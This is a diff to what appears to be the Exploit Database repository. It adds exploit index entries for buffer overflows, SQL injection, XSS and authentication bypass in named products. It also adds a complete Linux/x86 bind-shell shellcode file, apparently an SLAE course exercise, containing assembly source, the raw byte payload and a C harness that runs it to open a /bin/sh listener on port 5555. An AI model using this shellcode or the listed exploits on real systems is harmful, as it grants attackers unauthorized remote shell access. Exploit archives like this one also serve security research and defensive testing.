+44787,exploits/windows_x86/local/44787.py,"ALFTP 5.31 - Local Buffer Overflow (SEH Bypass)",2018-05-28,"Gokul Babu",local,windows_x86,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16528,6 +16529,7 @@ id,file,description,date,author,type,platform,port
 44656,exploits/multiple/remote/44656.txt,"mySCADA myPRO 7 - Hard-Coded Credentials",2018-05-20,"Emre ÖVÜNÇ",remote,multiple,
 44760,exploits/hardware/remote/44760.rb,"D-Link DSL-2750B - OS Command Injection (Metasploit)",2018-05-25,Metasploit,remote,hardware,
 44779,exploits/hardware/remote/44779.txt,"Bitmain Antminer D3/L3+/S9 - Remote Command Execution",2018-05-27,CorryL,remote,hardware,
+44784,exploits/windows_x86-64/remote/44784.py,"CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)",2018-05-28,"Juan Prescotto",remote,windows_x86-64,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39442,7 +39444,7 @@ id,file,description,date,author,type,platform,port
 44765,exploits/php/webapps/44765.txt,"EasyService Billing 1.0 - 'q' SQL Injection",2018-05-26,"Divya Jain",webapps,php,
 44766,exploits/php/webapps/44766.txt,"mySurvey 1.0 - 'id' SQL Injection",2018-05-26,AkkuS,webapps,php,
 44767,exploits/php/webapps/44767.txt,"easyLetters 1.0 - 'id' SQL Injection",2018-05-26,AkkuS,webapps,php,
-44769,exploits/php/webapps/44769.txt,"Wordpress Plugin Events Calendar - SQL Injection / Cross-Site Scripting",2018-05-27,AkkuS,webapps,php,
+44769,exploits/php/webapps/44769.txt,"Wordpress Plugin Booking Calendar 3.0.0 - SQL Injection / Cross-Site Scripting",2018-05-27,AkkuS,webapps,php,
 44770,exploits/php/webapps/44770.txt,"Ingenious School Management System - 'id' SQL Injection",2018-05-27,"Meisam Monsef",webapps,php,
 44771,exploits/php/webapps/44771.html,"Sharetronix CMS 3.6.2 - Cross-Site Request Forgery / Cross-Site Scripting",2018-05-27,"Hesam Bazvand",webapps,php,
 44772,exploits/php/webapps/44772.txt,"Lyrist - 'id' SQL Injection",2018-05-27,"Meisam Monsef",webapps,php,
@@ -39451,3 +39453,11 @@ id,file,description,date,author,type,platform,port
 44775,exploits/php/webapps/44775.txt,"ClipperCMS 1.3.3 - Cross-Site Scripting",2018-05-27,"Nathu Nandwani",webapps,php,
 44777,exploits/php/webapps/44777.txt,"My Directory 2.0 - SQL Injection / Cross-Site Scripting",2018-05-27,AkkuS,webapps,php,
 44778,exploits/php/webapps/44778.txt,"Baby Names Search Engine 1.0 - 'a' SQL Injection",2018-05-27,AkkuS,webapps,php,
+44781,exploits/hardware/webapps/44781.txt,"TP-Link TL-WR840N/TL-WR841N - Authenticaton Bypass",2018-05-28,"BlackFog Team",webapps,hardware,
+44782,exploits/php/webapps/44782.txt,"DomainMod 4.09.03 - 'oid' Cross-Site Scripting",2018-05-28,longer,webapps,php,
+44783,exploits/php/webapps/44783.txt,"DomainMod 4.09.03 - 'sslpaid' Cross-Site Scripting",2018-05-28,longer,webapps,php,
+44785,exploits/php/webapps/44785.txt,"Wordpress Plugin Events Calendar - SQL Injection",2018-05-28,AkkuS,webapps,php,
+44786,exploits/php/webapps/44786.txt,"Joomla! Component Full Social 1.1.0 - 'search_query' SQL Injection",2018-05-28,L0RD,webapps,php,
+44788,exploits/php/webapps/44788.html,"Joomla! Component jCart for OpenCart 2.3.0.2 - Cross-Site Request Forgery",2018-05-28,L0RD,webapps,php,
+44789,exploits/php/webapps/44789.html,"Joomla! Component JoomOCShop 1.0 - Cross-Site Request Forgery",2018-05-28,L0RD,webapps,php,
+44790,exploits/php/webapps/44790.txt,"wityCMS 0.6.1 - Cross-Site Scripting",2018-05-28,"Nathu Nandwani",webapps,php,

files_shellcodes.csv

@@ -887,3 +887,4 @@ id,file,description,date,author,type,platform
 44723,shellcodes/linux_x86/44723.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (113 bytes)",2018-05-23,"Matteo Malvica",shellcode,linux_x86
 44738,shellcodes/linux_x86/44738.c,"Linux/x86 - Reverse (10.10.2.4:4444/TCP) Shell Shellcode (68 bytes)",2018-05-24,"Nuno Freitas",shellcode,linux_x86
 44740,shellcodes/linux_x86/44740.c,"Linux/x86 - Reverse (10.0.7.17:4444/TCP) Shell (/bin/sh) Shellcode (101 Bytes)",2018-05-24,"Jonathan Crosby",shellcode,linux_x86
+44791,shellcodes/linux_x86/44791.c,"Linux/x86 - Bind (5555/TCP) Shell Shellcode (98 bytes)",2018-05-28,Luca,shellcode,linux_x86

shellcodes/linux_x86/44791.c

@@ -0,0 +1,120 @@
+#include<stdio.h>
+#include<string.h>
+
+/*
+
+; Bind TCP Shellcode
+; Copyright 2018, Luca Di Domenico
+;
+; This program is free software: you can redistribute it and/or modify
+; it under the terms of the GNU General Public License as published by
+; the Free Software Foundation, either version 3 of the License, or
+; (at your option) any later version.
+;
+; This program is distributed in the hope that it will be useful,
+; but WITHOUT ANY WARRANTY; without even the implied warranty of
+; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+; GNU General Public License for more details.
+;
+; You should have received a copy of the GNU General Public License
+; along with this program.  If not, see <http://www.gnu.org/licenses/>.
+
+; Title:     Linux/x86 - TCP bind shell
+; Author:    Luca Di Domenico
+; Website:   https://thehackeradventure.com
+; Blog post: https://thehackeradventure.com/2018/05/17/assignement1/
+; Twitter:    @sudo45
+; SLAE-ID:    1245
+
+global _start
+
+section .text
+_start:
+	xor eax, eax
+	xor ebx, ebx
+	xor ecx, ecx
+	xor edx, edx
+
+; socket()
+
+	push eax			
+	mov al, 0x66
+	mov bl, 0x1
+	mov cl, 0x2
+	push ebx			
+	push ecx			
+	lea ecx, [esp]
+	int 0x80			
+	
+; bind()
+
+	pop ecx
+	pop ebx
+	push word 0xb315	
+	push word cx			
+	mov ecx, esp
+	mov dl, 0x10	
+	push edx
+	push ecx	
+	push eax	
+	xchg eax, edx
+	mov al, 0x66
+	mov bl, 0x2
+	mov ecx, esp
+	int 0x80			
+
+; listen()
+
+	push eax
+	push edx
+	mov al, 0x66
+	mov bl, 0x4
+	mov ecx, esp
+	mov edx, eax
+	int 0x80			
+	
+; accept()
+
+	xchg eax, edx
+	pop edi
+	push edx
+	push edi
+	inc ebx
+	mov ecx, esp
+	int 0x80			
+	xchg ebx, eax 
+	xor ecx, ecx
+	mov cl, 0x2
+	
+_dup2_loop:
+
+	mov al, 0x3f
+	int 0x80
+	dec ecx
+	jns _dup2_loop
+
+; execve()
+
+	xor ecx, ecx
+	push ecx     ; 0x00 
+	push 0x68732f2f	; hs//
+	push 0x6e69622f	; nib/
+	mov ebx, esp
+	mov al, 0xb
+	int 0x80 			
+
+*/
+
+unsigned char code[] = \
+"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\xb0\x66\xb3\x01\xb1\x02\x53\x51\x8d\x0c\x24\xcd\x80\x59\x5b\x66\x68\x15\xb3\x66\x51\x89\xe1\xb2\x10\x52\x51\x50\x92\xb0\x66\xb3\x02\x89\xe1\xcd\x80\x50\x52\xb0\x66\xb3\x04\x89\xe1\x89\xc2\xcd\x80\x92\x5f\x52\x57\x43\x89\xe1\xcd\x80\x93\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc9\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80";
+
+main()
+{
+
+	printf("Shellcode Length:  %d\n", strlen(code));
+
+	int (*ret)() = (int(*)())code;
+
+	ret();
+
+}